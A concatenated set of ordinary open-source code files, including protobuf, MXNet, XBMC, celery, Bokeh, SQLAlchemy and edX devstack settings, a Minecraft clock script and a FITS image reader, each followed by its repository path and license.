output_type=output_type, options=_OptionsOrNone(method_proto), # pylint: disable=protected-access create_key=descriptor._internal_create_key) def _ExtractSymbols(self, descriptors): """Pulls out all the symbols from descriptor protos. Args: descriptors: The messages to extract descriptors from. Yields: A two element tuple of the type name and descriptor object. """ for desc in descriptors: yield (_PrefixWithDot(desc.full_name), desc) for symbol in self._ExtractSymbols(desc.nested_types): yield symbol for enum in desc.enum_types: yield (_PrefixWithDot(enum.full_name), enum) def _GetDeps(self, dependencies): """Recursively finds dependencies for file protos. Args: dependencies: The names of the files being depended on. Yields: Each direct and indirect dependency. """ for dependency in dependencies: dep_desc = self.FindFileByName(dependency) yield dep_desc for parent_dep in dep_desc.dependencies: yield parent_dep def _GetTypeFromScope(self, package, type_name, scope): """Finds a given type name in the current scope. Args: package: The package the proto should be located in. type_name: The name of the type to be found in the scope. scope: Dict mapping short and full symbols to message and enum types. Returns: The descriptor for the requested type. """ if type_name not in scope: components = _PrefixWithDot(package).split('.') while components: possible_match = '.'.join(components + [type_name]) if possible_match in scope: type_name = possible_match break else: components.pop(-1) return scope[type_name] def _PrefixWithDot(name): return name if name.startswith('.') else '.%s' % name if _USE_C_DESCRIPTORS: # TODO(amauryfa): This pool could be constructed from Python code, when we # support a flag like 'use_cpp_generated_pool=True'. # pylint: disable=protected-access _DEFAULT = descriptor._message.default_pool else: _DEFAULT = DescriptorPool() def Default(): return _DEFAULT
apache-2.0
Ldpe2G/mxnet
example/ssd/tools/visualize_net.py
10
1148
from __future__ import print_function import find_mxnet import mxnet as mx import importlib import argparse import sys parser = argparse.ArgumentParser(description='network visualization') parser.add_argument('--network', type=str, default='vgg16_ssd_300', choices = ['vgg16_ssd_300', 'vgg16_ssd_512'], help = 'the cnn to use') parser.add_argument('--num-classes', type=int, default=20, help='the number of classes') parser.add_argument('--data-shape', type=int, default=300, help='set image\'s shape') parser.add_argument('--train', action='store_true', default=False, help='show train net') args = parser.parse_args() sys.path.append('../symbol') if not args.train: net = importlib.import_module("symbol_" + args.network).get_symbol(args.num_classes) a = mx.viz.plot_network(net, shape={"data":(1,3,args.data_shape,args.data_shape)}, \ node_attrs={"shape":'rect', "fixedsize":'false'}) a.render("ssd_" + args.network) else: net = importlib.import_module("symbol_" + args.network).get_symbol_train(args.num_classes) print(net.tojson())
apache-2.0
atupone/xbmc
addons/service.xbmc.versioncheck/lib/aptdeamonhandler.py
177
3661
# -*- coding: utf-8 -*- # # Copyright (C) 2013 Team-XBMC # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # import xbmc from common import * try: #import apt import apt from aptdaemon import client from aptdaemon import errors except: log('python apt import error') class AptdeamonHandler: def __init__(self): self.aptclient = client.AptClient() def _check_versions(self, package): if not self._update_cache(): return False, False try: trans = self.aptclient.upgrade_packages([package]) #trans = self.aptclient.upgrade_packages("bla") trans.simulate(reply_handler=self._apttransstarted, error_handler=self._apterrorhandler) pkg = trans.packages[4][0] if pkg == package: cache=apt.Cache() cache.open(None) cache.upgrade() if cache[pkg].installed: return cache[pkg].installed.version, cache[pkg].candidate.version return False, False except Exception as error: log("Exception while checking versions: %s" %error) return False, False def _update_cache(self): try: if self.aptclient.update_cache(wait=True) == "exit-success": return True else: return False except errors.NotAuthorizedError: log("You are not allowed to update the cache") return False def check_upgrade_available(self, package): '''returns True if newer package is available in the repositories''' installed, candidate = self._check_versions(package) if installed and candidate: if installed != candidate: log("Version installed %s" %installed) log("Version available %s" %candidate) return True else: log("Already on newest version") elif not installed: log("No installed package found") return False else: return False def upgrade_package(self, package): try: log("Installing new version") if self.aptclient.upgrade_packages([package], wait=True) == "exit-success": log("Upgrade successful") return True except Exception as error: log("Exception during upgrade: %s" %error) return False def upgrade_system(self): try: log("Upgrading system") if self.aptclient.upgrade_system(wait=True) == "exit-success": return True except Exception as error: log("Exception during system upgrade: %s" %error) return False def _getpassword(self): if len(self._pwd) == 0: self._pwd = get_password_from_user() return self._pwd def _apttransstarted(self): pass def _apterrorhandler(self, error): log("Apt Error %s" %error)
gpl-2.0
slaws/kubernetes
examples/selenium/selenium-test.py
173
1109
#!/usr/bin/env python # Copyright 2015 The Kubernetes Authors All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from selenium import webdriver from selenium.webdriver.common.desired_capabilities import DesiredCapabilities def check_browser(browser): driver = webdriver.Remote( command_executor='http://selenium-hub:4444/wd/hub', desired_capabilities=getattr(DesiredCapabilities, browser) ) driver.get("http://google.com") assert "google" in driver.page_source driver.close() print("Browser %s checks out!" % browser) check_browser("FIREFOX") check_browser("CHROME")
apache-2.0
johankaito/fufuka
microblog/flask/venv/lib/python2.7/site-packages/celery/utils/threads.py
9
9636
# -*- coding: utf-8 -*- """ celery.utils.threads ~~~~~~~~~~~~~~~~~~~~ Threading utilities. """ from __future__ import absolute_import, print_function import os import socket import sys import threading import traceback from contextlib import contextmanager from celery.local import Proxy from celery.five import THREAD_TIMEOUT_MAX, items __all__ = ['bgThread', 'Local', 'LocalStack', 'LocalManager', 'get_ident', 'default_socket_timeout'] USE_FAST_LOCALS = os.environ.get('USE_FAST_LOCALS') PY3 = sys.version_info[0] == 3 @contextmanager def default_socket_timeout(timeout): prev = socket.getdefaulttimeout() socket.setdefaulttimeout(timeout) yield socket.setdefaulttimeout(prev) class bgThread(threading.Thread): def __init__(self, name=None, **kwargs): super(bgThread, self).__init__() self._is_shutdown = threading.Event() self._is_stopped = threading.Event() self.daemon = True self.name = name or self.__class__.__name__ def body(self): raise NotImplementedError('subclass responsibility') def on_crash(self, msg, *fmt, **kwargs): print(msg.format(*fmt), file=sys.stderr) exc_info = sys.exc_info() try: traceback.print_exception(exc_info[0], exc_info[1], exc_info[2], None, sys.stderr) finally: del(exc_info) def run(self): body = self.body shutdown_set = self._is_shutdown.is_set try: while not shutdown_set(): try: body() except Exception as exc: try: self.on_crash('{0!r} crashed: {1!r}', self.name, exc) self._set_stopped() finally: os._exit(1) # exiting by normal means won't work finally: self._set_stopped() def _set_stopped(self): try: self._is_stopped.set() except TypeError: # pragma: no cover # we lost the race at interpreter shutdown, # so gc collected built-in modules. pass def stop(self): """Graceful shutdown.""" self._is_shutdown.set() self._is_stopped.wait() if self.is_alive(): self.join(THREAD_TIMEOUT_MAX) try: from greenlet import getcurrent as get_ident except ImportError: # pragma: no cover try: from _thread import get_ident # noqa except ImportError: try: from thread import get_ident # noqa except ImportError: # pragma: no cover try: from _dummy_thread import get_ident # noqa except ImportError: from dummy_thread import get_ident # noqa def release_local(local): """Releases the contents of the local for the current context. This makes it possible to use locals without a manager. Example:: >>> loc = Local() >>> loc.foo = 42 >>> release_local(loc) >>> hasattr(loc, 'foo') False With this function one can release :class:`Local` objects as well as :class:`StackLocal` objects. However it is not possible to release data held by proxies that way, one always has to retain a reference to the underlying local object in order to be able to release it. .. versionadded:: 0.6.1 """ local.__release_local__() class Local(object): __slots__ = ('__storage__', '__ident_func__') def __init__(self): object.__setattr__(self, '__storage__', {}) object.__setattr__(self, '__ident_func__', get_ident) def __iter__(self): return iter(items(self.__storage__)) def __call__(self, proxy): """Create a proxy for a name.""" return Proxy(self, proxy) def __release_local__(self): self.__storage__.pop(self.__ident_func__(), None) def __getattr__(self, name): try: return self.__storage__[self.__ident_func__()][name] except KeyError: raise AttributeError(name) def __setattr__(self, name, value): ident = self.__ident_func__() storage = self.__storage__ try: storage[ident][name] = value except KeyError: storage[ident] = {name: value} def __delattr__(self, name): try: del self.__storage__[self.__ident_func__()][name] except KeyError: raise AttributeError(name) class _LocalStack(object): """This class works similar to a :class:`Local` but keeps a stack of objects instead. This is best explained with an example:: >>> ls = LocalStack() >>> ls.push(42) >>> ls.top 42 >>> ls.push(23) >>> ls.top 23 >>> ls.pop() 23 >>> ls.top 42 They can be force released by using a :class:`LocalManager` or with the :func:`release_local` function but the correct way is to pop the item from the stack after using. When the stack is empty it will no longer be bound to the current context (and as such released). By calling the stack without arguments it will return a proxy that resolves to the topmost item on the stack. """ def __init__(self): self._local = Local() def __release_local__(self): self._local.__release_local__() def _get__ident_func__(self): return self._local.__ident_func__ def _set__ident_func__(self, value): object.__setattr__(self._local, '__ident_func__', value) __ident_func__ = property(_get__ident_func__, _set__ident_func__) del _get__ident_func__, _set__ident_func__ def __call__(self): def _lookup(): rv = self.top if rv is None: raise RuntimeError('object unbound') return rv return Proxy(_lookup) def push(self, obj): """Pushes a new item to the stack""" rv = getattr(self._local, 'stack', None) if rv is None: self._local.stack = rv = [] rv.append(obj) return rv def pop(self): """Remove the topmost item from the stack, will return the old value or `None` if the stack was already empty. """ stack = getattr(self._local, 'stack', None) if stack is None: return None elif len(stack) == 1: release_local(self._local) return stack[-1] else: return stack.pop() def __len__(self): stack = getattr(self._local, 'stack', None) return len(stack) if stack else 0 @property def stack(self): """get_current_worker_task uses this to find the original task that was executed by the worker.""" stack = getattr(self._local, 'stack', None) if stack is not None: return stack return [] @property def top(self): """The topmost item on the stack. If the stack is empty, `None` is returned. """ try: return self._local.stack[-1] except (AttributeError, IndexError): return None class LocalManager(object): """Local objects cannot manage themselves. For that you need a local manager. You can pass a local manager multiple locals or add them later by appending them to `manager.locals`. Everytime the manager cleans up it, will clean up all the data left in the locals for this context. The `ident_func` parameter can be added to override the default ident function for the wrapped locals. """ def __init__(self, locals=None, ident_func=None): if locals is None: self.locals = [] elif isinstance(locals, Local): self.locals = [locals] else: self.locals = list(locals) if ident_func is not None: self.ident_func = ident_func for local in self.locals: object.__setattr__(local, '__ident_func__', ident_func) else: self.ident_func = get_ident def get_ident(self): """Return the context identifier the local objects use internally for this context. You cannot override this method to change the behavior but use it to link other context local objects (such as SQLAlchemy's scoped sessions) to the Werkzeug locals.""" return self.ident_func() def cleanup(self): """Manually clean up the data in the locals for this context. Call this at the end of the request or use `make_middleware()`. """ for local in self.locals: release_local(local) def __repr__(self): return '<{0} storages: {1}>'.format( self.__class__.__name__, len(self.locals)) class _FastLocalStack(threading.local): def __init__(self): self.stack = [] self.push = self.stack.append self.pop = self.stack.pop @property def top(self): try: return self.stack[-1] except (AttributeError, IndexError): return None def __len__(self): return len(self.stack) if USE_FAST_LOCALS: # pragma: no cover LocalStack = _FastLocalStack else: # - See #706 # since each thread has its own greenlet we can just use those as # identifiers for the context. If greenlets are not available we # fall back to the current thread ident. LocalStack = _LocalStack # noqa
apache-2.0
smolix/incubator-mxnet
example/rcnn/rcnn/pycocotools/setup.py
41
1365
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from distutils.core import setup from Cython.Build import cythonize from distutils.extension import Extension import numpy as np # To compile and install locally run "python setup.py build_ext --inplace" # To install library to Python site-packages run "python setup.py build_ext install" ext_modules = [ Extension( '_mask', sources=['maskApi.c', '_mask.pyx'], include_dirs=[np.get_include()], extra_compile_args=['-Wno-cpp', '-Wno-unused-function', '-std=c99'], ) ] setup(name='pycocotools', ext_modules=cythonize(ext_modules) )
apache-2.0
KasperPRasmussen/bokeh
bokeh/models/tiles.py
8
4095
from __future__ import absolute_import from ..model import Model from ..core.properties import Any, Dict, Float, String, Int, Bool, Override class TileSource(Model): """ A base class for all tile source types. ``TileSource`` is not generally useful to instantiate on its own. In general, tile sources are used as a required input for ``TileRenderer``. Subclasses should have these properties as well: x_origin_offset = Float y_origin_offset = Float initial_resolution = Float """ _args = ('url', 'tile_size', 'min_zoom', 'max_zoom', 'extra_url_vars') url = String("", help=""" tile service url (example: http://c.tile.openstreetmap.org/{Z}/{X}/{Y}.png) """) tile_size = Int(default=256, help=""" tile size in pixels (e.g. 256) """) min_zoom = Int(default=0, help=""" the minimum zoom level for the tile layer. This is the most "zoomed-out" level. """) max_zoom = Int(default=30, help=""" the maximum zoom level for the tile layer. This is the most "zoomed-in" level. """) extra_url_vars = Dict(String, Any, help=""" A dictionary that maps url variable template keys to values. These variables are useful for parts of tile urls which do not change from tile to tile (e.g. server host name, or layer name). """) attribution = String("", help=""" Data provider attribution content. This can include HTML content. """) x_origin_offset = Float(help=""" x offset in plot coordinates """) y_origin_offset = Float(help=""" y offset in plot coordinates """) initial_resolution = Float(help=""" resolution (plot_units / pixels) of minimum zoom level of tileset projection. None to auto-compute. """) class MercatorTileSource(TileSource): """``MercatorTileSource`` is not generally useful to instantiate on its own, but is the parent class of mercator tile services (e.g. ``WMTSTileSource``). """ _args = ('url', 'tile_size', 'min_zoom', 'max_zoom', 'x_origin_offset', 'y_origin_offset', 'extra_url_vars', 'initial_resolution') x_origin_offset = Override(default=20037508.34) y_origin_offset = Override(default=20037508.34) initial_resolution = Override(default=156543.03392804097) wrap_around = Bool(default=True, help=""" Enables continuous horizontal panning by wrapping the x-axis based on bounds of map. Note that axis coordinates are not wrapped. To toggle axis label visibility, use ``plot.axis.visible = False``. """) class TMSTileSource(MercatorTileSource): """ The TMSTileSource contains tile config info and provides urls for tiles based on a templated url e.g. ``http://your.tms.server.host/{Z}/{X}/{Y}.png``. The defining feature of TMS is the tile-origin in located at the bottom-left. The TMSTileSource can also be helpful in implementing tile renderers for custom tile sets, including non-spatial datasets. """ pass class WMTSTileSource(MercatorTileSource): """ The ``WMTSTileSource`` behaves much like ``TMSTileSource`` but has its tile-origin in the top-left. This is the most common used tile source for web mapping applications. Such companies as Google, MapQuest, Stamen, Esri, and OpenStreetMap provide service which use the WMTS specification e.g. ``http://c.tile.openstreetmap.org/{Z}/{X}/{Y}.png``. """ pass class QUADKEYTileSource(MercatorTileSource): """ The QUADKEYTileSource has the same tile origin as the WMTSTileSource but requests tiles using a `quadkey` argument instead of X, Y, Z e.g. ``http://your.quadkey.tile.host/{Q}.png`` """ pass class BBoxTileSource(MercatorTileSource): """ The BBoxTileSource has the same default tile origin as the WMTSTileSource but requested tiles use a ``{XMIN}``, ``{YMIN}``, ``{XMAX}``, ``{YMAX}`` e.g. ``http://your.custom.tile.service?bbox={XMIN},{YMIN},{XMAX},{YMAX}``. """ use_latlon = Bool(default=False, help=""" Flag which indicates option to output {XMIN},{YMIN},{XMAX},{YMAX} in meters or latitude and longitude. """)
bsd-3-clause
martinohanlon/minecraft-clock
minecraft-clock.py
1
5099
#www.stuffaboutcode.com #Raspberry Pi, Minecraft Analogue Clock #import the minecraft.py module from the minecraft directory import minecraft.minecraft as minecraft #import minecraft block module import minecraft.block as block #import time, so delays can be used import time #import datetime, to get the time! import datetime #import math so we can use cos and sin import math def drawCircle(mc, x0, y0, z, radius, blockType): f = 1 - radius ddf_x = 1 ddf_y = -2 * radius x = 0 y = radius mc.setBlock(x0, y0 + radius, z, blockType) mc.setBlock(x0, y0 - radius, z, blockType) mc.setBlock(x0 + radius, y0, z, blockType) mc.setBlock(x0 - radius, y0, z, blockType) while x < y: if f >= 0: y -= 1 ddf_y += 2 f += ddf_y x += 1 ddf_x += 2 f += ddf_x mc.setBlock(x0 + x, y0 + y, z, blockType) mc.setBlock(x0 - x, y0 + y, z, blockType) mc.setBlock(x0 + x, y0 - y, z, blockType) mc.setBlock(x0 - x, y0 - y, z, blockType) mc.setBlock(x0 + y, y0 + x, z, blockType) mc.setBlock(x0 - y, y0 + x, z, blockType) mc.setBlock(x0 + y, y0 - x, z, blockType) mc.setBlock(x0 - y, y0 - x, z, blockType) def drawLine(mc, x, y, z, x2, y2, blockType): """Brensenham line algorithm""" steep = 0 coords = [] dx = abs(x2 - x) if (x2 - x) > 0: sx = 1 else: sx = -1 dy = abs(y2 - y) if (y2 - y) > 0: sy = 1 else: sy = -1 if dy > dx: steep = 1 x,y = y,x dx,dy = dy,dx sx,sy = sy,sx d = (2 * dy) - dx for i in range(0,dx): if steep: mc.setBlock(y, x, z, blockType) else: mc.setBlock(x, y, z, blockType) while d >= 0: y = y + sy d = d - (2 * dx) x = x + sx d = d + (2 * dy) mc.setBlock(x2, y2, z, blockType) def findPointOnCircle(cx, cy, radius, angle): x = cx + math.sin(math.radians(angle)) * radius y = cy + math.cos(math.radians(angle)) * radius return((int(x + 0.5),int(y + 0.5))) def getAngleForHand(positionOnClock): angle = 360 * (positionOnClock / 60.0) return angle def drawHourHand(mc, clockCentre, hours, minutes, blockType): if (hours > 11): hours = hours - 12 angle = getAngleForHand(int((hours * 5) + (minutes * (5.0/60.0)))) hourHandEnd = findPointOnCircle(clockCentre.x, clockCentre.y, 10.0, angle) drawLine(mc, clockCentre.x, clockCentre.y, clockCentre.z - 1, hourHandEnd[0], hourHandEnd[1], blockType) def drawMinuteHand(mc, clockCentre, minutes, blockType): angle = getAngleForHand(minutes) minuteHandEnd = findPointOnCircle(clockCentre.x, clockCentre.y, 18.0, angle) drawLine(mc, clockCentre.x, clockCentre.y, clockCentre.z, minuteHandEnd[0], minuteHandEnd[1], blockType) def drawSecondHand(mc, clockCentre, seconds, blockType): angle = getAngleForHand(seconds) secondHandEnd = findPointOnCircle(clockCentre.x, clockCentre.y, 20.0, angle) drawLine(mc, clockCentre.x, clockCentre.y, clockCentre.z + 1, secondHandEnd[0], secondHandEnd[1], blockType) def drawClock(mc, clockCentre, radius, time): blockType = block.DIAMOND_BLOCK #draw the circle drawCircle(mc, clockCentre.x, clockCentre.y, clockCentre.z, radius, blockType) #draw hour hand drawHourHand(mc, clockCentre, time.hour, time.minute, block.DIRT) #draw minute hand drawMinuteHand(mc, clockCentre, time.minute, block.STONE) #draw second hand drawSecondHand(mc, clockCentre, time.second, block.WOOD_PLANKS) def updateTime(mc, clockCentre, lastTime, time): #draw hour and minute hand if (lastTime.minute != time.minute): #clear hour hand drawHourHand(mc, clockCentre, lastTime.hour, lastTime.minute, block.AIR) #new hour hand drawHourHand(mc, clockCentre, time.hour, time.minute, block.DIRT) #clear hand drawMinuteHand(mc, clockCentre, lastTime.minute, block.AIR) #new hand drawMinuteHand(mc, clockCentre, time.minute, block.STONE) #draw second hand if (lastTime.second != time.second): #clear hand drawSecondHand(mc, clockCentre, lastTime.second, block.AIR) #new hand drawSecondHand(mc, clockCentre, time.second, block.WOOD_PLANKS) if __name__ == "__main__": clockCentre = minecraft.Vec3(0, 30, 0) radius = 20 print "STARTED" time.sleep(5) #Connect to minecraft by creating the minecraft object # - minecraft needs to be running and in a game mc = minecraft.Minecraft.create() #Post a message to the minecraft chat window mc.postToChat("Hi, Minecraft Analogue Clock, www.stuffaboutcode.com") time.sleep(2) lastTime = datetime.datetime.now() drawClock(mc, clockCentre, radius, lastTime) try: while True: nowTime = datetime.datetime.now() updateTime(mc, clockCentre, lastTime, nowTime) lastTime = nowTime time.sleep(0.5) except KeyboardInterrupt: print "stopped"
mit
foss-transportationmodeling/rettina-server
flask/local/lib/python2.7/site-packages/sqlalchemy/dialects/mssql/adodbapi.py
80
2493
# mssql/adodbapi.py # Copyright (C) 2005-2015 the SQLAlchemy authors and contributors # <see AUTHORS file> # # This module is part of SQLAlchemy and is released under # the MIT License: http://www.opensource.org/licenses/mit-license.php """ .. dialect:: mssql+adodbapi :name: adodbapi :dbapi: adodbapi :connectstring: mssql+adodbapi://<username>:<password>@<dsnname> :url: http://adodbapi.sourceforge.net/ .. note:: The adodbapi dialect is not implemented SQLAlchemy versions 0.6 and above at this time. """ import datetime from sqlalchemy import types as sqltypes, util from sqlalchemy.dialects.mssql.base import MSDateTime, MSDialect import sys class MSDateTime_adodbapi(MSDateTime): def result_processor(self, dialect, coltype): def process(value): # adodbapi will return datetimes with empty time # values as datetime.date() objects. # Promote them back to full datetime.datetime() if type(value) is datetime.date: return datetime.datetime(value.year, value.month, value.day) return value return process class MSDialect_adodbapi(MSDialect): supports_sane_rowcount = True supports_sane_multi_rowcount = True supports_unicode = sys.maxunicode == 65535 supports_unicode_statements = True driver = 'adodbapi' @classmethod def import_dbapi(cls): import adodbapi as module return module colspecs = util.update_copy( MSDialect.colspecs, { sqltypes.DateTime: MSDateTime_adodbapi } ) def create_connect_args(self, url): keys = url.query connectors = ["Provider=SQLOLEDB"] if 'port' in keys: connectors.append("Data Source=%s, %s" % (keys.get("host"), keys.get("port"))) else: connectors.append("Data Source=%s" % keys.get("host")) connectors.append("Initial Catalog=%s" % keys.get("database")) user = keys.get("user") if user: connectors.append("User Id=%s" % user) connectors.append("Password=%s" % keys.get("password", "")) else: connectors.append("Integrated Security=SSPI") return [[";".join(connectors)], {}] def is_disconnect(self, e, connection, cursor): return isinstance(e, self.dbapi.adodbapi.DatabaseError) and \ "'connection failure'" in str(e) dialect = MSDialect_adodbapi
apache-2.0
okanasik/JdeRobot
src/drivers/MAVLinkServer/MAVProxy/modules/mavproxy_smartcamera/sc_config.py
4
5131
""" SmartCameraConfig class : handles config for the smart_camera project smart_camera.cnf file is created in the local directory other classes or files wishing to use this class should add import sc_config """ from os.path import expanduser import ConfigParser class SmartCameraConfig(object): def __init__(self): # default config file self.config_file = expanduser("~/smart_camera.cnf") # print config file location print ("config file: %s" % self.config_file) # create the global parser object self.parser = ConfigParser.SafeConfigParser() # read the config file into memory self.read() # read - reads the contents of the file into the dictionary in RAM def read(self): try: self.parser.read(self.config_file) except IOError as e: print ('Error {0} reading config file: {1}: '.format(e.errno, e.strerror)) return # save - saves the config to disk def save(self): try: with open(self.config_file, 'wb') as configfile: self.parser.write(configfile) except IOError as e: print ('Error {0} writing config file: {1}: '.format(e.errno, e.strerror)) return # check_section - ensures the section exists, creates it if not def check_section(self, section): if not self.parser.has_section(section): self.parser.add_section(section) return # get_boolean - returns the boolean found in the specified section/option or the default if not found def get_boolean(self, section, option, default): try: return self.parser.getboolean(section, option) except ConfigParser.Error: return default # set_boolean - sets the boolean to the specified section/option def set_boolean(self, section, option, new_value): self.check_section(section) self.parser.set(section, option, str(bool(new_value))) return # get_integer - returns the integer found in the specified section/option or the default if not found def get_integer(self, section, option, default): try: return self.parser.getint(section, option) except ConfigParser.Error: return default # set_integer - sets the integer to the specified section/option def set_integer(self, section, option, new_value): self.check_section(section) self.parser.set(section, option, str(int(new_value))) return # get_float - returns the float found in the specified section/option or the default if not found def get_float(self, section, option, default): try: return self.parser.getfloat(section, option) except ConfigParser.Error: return default # set_float - sets the float to the specified section/option def set_float(self, section, option, new_value): self.check_section(section) self.parser.set(section, option, str(float(new_value))) return # get_string - returns the string found in the specified section/option or the default if not found def get_string(self, section, option, default): try: return self.parser.get(section, option) except ConfigParser.Error: return default # set_string - sets the string to the specified section/option def set_string(self, section, option, new_value): self.check_section(section) self.parser.set(section, option, str(new_value)) return # main - tests SmartCameraConfig class def main(self): # print welcome message print ("SmartCameraConfig v1.0 test") print ("config file: %s" % self.config_file) # write and read a boolean section = 'Test_Section1' option = 'Test_boolean' print ("Writing %s/%s = True" % (section,option)) self.set_boolean(section,option,True) print ("Read %s/%s : %s" % (section, option, self.get_boolean(section, option, False))) # write and read an integer section = 'Test_Section1' option = 'Test_integer' print ("Writing %s/%s = 11" % (section,option)) self.set_integer(section,option,11) print ("Read %s/%s : %s" % (section, option, self.get_integer(section, option, 99))) # write and read a float section = 'Test_Section1' option = 'Test_float' print ("Writing %s/%s = 12.345" % (section,option)) self.set_float(section,option,12.345) print ("Read %s/%s : %s" % (section, option, self.get_float(section, option, 0.01))) # read an undefined number to get back the default section = 'Test_Section2' option = 'test_default' print ("Read %s/%s : %s" % (section, option, self.get_float(section, option, 21.21))) # save the config file self.save() return # declare global config object config = SmartCameraConfig() # run the main routine if this is file is called from the command line if __name__ == "__main__": config.main()
gpl-3.0
cselis86/edx-platform
lms/envs/devstack.py
6
4593
""" Specific overrides to the base prod settings to make development easier. """ from .aws import * # pylint: disable=wildcard-import, unused-wildcard-import # Don't use S3 in devstack, fall back to filesystem del DEFAULT_FILE_STORAGE MEDIA_ROOT = "/edx/var/edxapp/uploads" DEBUG = True USE_I18N = True TEMPLATE_DEBUG = True SITE_NAME = 'localhost:8000' # By default don't use a worker, execute tasks as if they were local functions CELERY_ALWAYS_EAGER = True ################################ LOGGERS ###################################### import logging # Disable noisy loggers for pkg_name in ['track.contexts', 'track.middleware', 'dd.dogapi']: logging.getLogger(pkg_name).setLevel(logging.CRITICAL) ################################ EMAIL ######################################## EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend' FEATURES['ENABLE_INSTRUCTOR_EMAIL'] = True # Enable email for all Studio courses FEATURES['REQUIRE_COURSE_EMAIL_AUTH'] = False # Give all courses email (don't require django-admin perms) ########################## ANALYTICS TESTING ######################## ANALYTICS_SERVER_URL = "http://127.0.0.1:9000/" ANALYTICS_API_KEY = "" # Set this to the dashboard URL in order to display the link from the # dashboard to the Analytics Dashboard. ANALYTICS_DASHBOARD_URL = None ################################ DEBUG TOOLBAR ################################ INSTALLED_APPS += ('debug_toolbar', 'debug_toolbar_mongo') MIDDLEWARE_CLASSES += ( 'django_comment_client.utils.QueryCountDebugMiddleware', 'debug_toolbar.middleware.DebugToolbarMiddleware', ) INTERNAL_IPS = ('127.0.0.1',) DEBUG_TOOLBAR_PANELS = ( 'debug_toolbar.panels.versions.VersionsPanel', 'debug_toolbar.panels.timer.TimerPanel', 'debug_toolbar.panels.settings.SettingsPanel', 'debug_toolbar.panels.headers.HeadersPanel', 'debug_toolbar.panels.request.RequestPanel', 'debug_toolbar.panels.sql.SQLPanel', 'debug_toolbar.panels.signals.SignalsPanel', 'debug_toolbar.panels.logging.LoggingPanel', 'debug_toolbar_mongo.panel.MongoDebugPanel', 'debug_toolbar.panels.profiling.ProfilingPanel', ) DEBUG_TOOLBAR_CONFIG = { 'SHOW_TOOLBAR_CALLBACK': 'lms.envs.devstack.should_show_debug_toolbar' } def should_show_debug_toolbar(_): return True # We always want the toolbar on devstack regardless of IP, auth, etc. ########################### PIPELINE ################################# PIPELINE_SASS_ARGUMENTS = '--debug-info --require {proj_dir}/static/sass/bourbon/lib/bourbon.rb'.format(proj_dir=PROJECT_ROOT) ########################### VERIFIED CERTIFICATES ################################# FEATURES['AUTOMATIC_VERIFY_STUDENT_IDENTITY_FOR_TESTING'] = True FEATURES['ENABLE_PAYMENT_FAKE'] = True CC_PROCESSOR_NAME = 'CyberSource2' CC_PROCESSOR = { 'CyberSource2': { "PURCHASE_ENDPOINT": '/shoppingcart/payment_fake/', "SECRET_KEY": 'abcd123', "ACCESS_KEY": 'abcd123', "PROFILE_ID": 'edx', } } ########################### External REST APIs ################################# FEATURES['ENABLE_OAUTH2_PROVIDER'] = True OAUTH_OIDC_ISSUER = 'http://127.0.0.1:8000/oauth2' FEATURES['ENABLE_MOBILE_REST_API'] = True FEATURES['ENABLE_VIDEO_ABSTRACTION_LAYER_API'] = True ########################## SECURITY ####################### FEATURES['ENFORCE_PASSWORD_POLICY'] = False FEATURES['ENABLE_MAX_FAILED_LOGIN_ATTEMPTS'] = False FEATURES['SQUELCH_PII_IN_LOGS'] = False FEATURES['PREVENT_CONCURRENT_LOGINS'] = False FEATURES['ADVANCED_SECURITY'] = False PASSWORD_MIN_LENGTH = None PASSWORD_COMPLEXITY = {} ########################### Milestones ################################# FEATURES['MILESTONES_APP'] = True ########################### Entrance Exams ################################# FEATURES['ENTRANCE_EXAMS'] = True ########################## Courseware Search ####################### FEATURES['ENABLE_COURSEWARE_SEARCH'] = True SEARCH_ENGINE = "search.elastic.ElasticSearchEngine" ########################## Certificates Web/HTML View ####################### FEATURES['CERTIFICATES_HTML_VIEW'] = True ##################################################################### # See if the developer has any local overrides. try: from .private import * # pylint: disable=import-error except ImportError: pass ##################################################################### # Lastly, run any migrations, if needed. MODULESTORE = convert_module_store_setting_if_needed(MODULESTORE) SECRET_KEY = '85920908f28904ed733fe576320db18cabd7b6cd'
agpl-3.0
youprofit/scikit-image
skimage/io/_plugins/fits_plugin.py
28
4735
__all__ = ['imread', 'imread_collection'] import skimage.io as io try: from astropy.io import fits as pyfits except ImportError: try: import pyfits except ImportError: raise ImportError( "PyFITS could not be found. Please refer to\n" "http://www.stsci.edu/resources/software_hardware/pyfits\n" "for further instructions.") def imread(fname, dtype=None): """Load an image from a FITS file. Parameters ---------- fname : string Image file name, e.g. ``test.fits``. dtype : dtype, optional For FITS, this argument is ignored because Stefan is planning on removing the dtype argument from imread anyway. Returns ------- img_array : ndarray Unlike plugins such as PIL, where different colour bands/channels are stored in the third dimension, FITS images are greyscale-only and can be N-dimensional, so an array of the native FITS dimensionality is returned, without colour channels. Currently if no image is found in the file, None will be returned Notes ----- Currently FITS ``imread()`` always returns the first image extension when given a Multi-Extension FITS file; use ``imread_collection()`` (which does lazy loading) to get all the extensions at once. """ hdulist = pyfits.open(fname) # Iterate over FITS image extensions, ignoring any other extension types # such as binary tables, and get the first image data array: img_array = None for hdu in hdulist: if isinstance(hdu, pyfits.ImageHDU) or \ isinstance(hdu, pyfits.PrimaryHDU): if hdu.data is not None: img_array = hdu.data break hdulist.close() return img_array def imread_collection(load_pattern, conserve_memory=True): """Load a 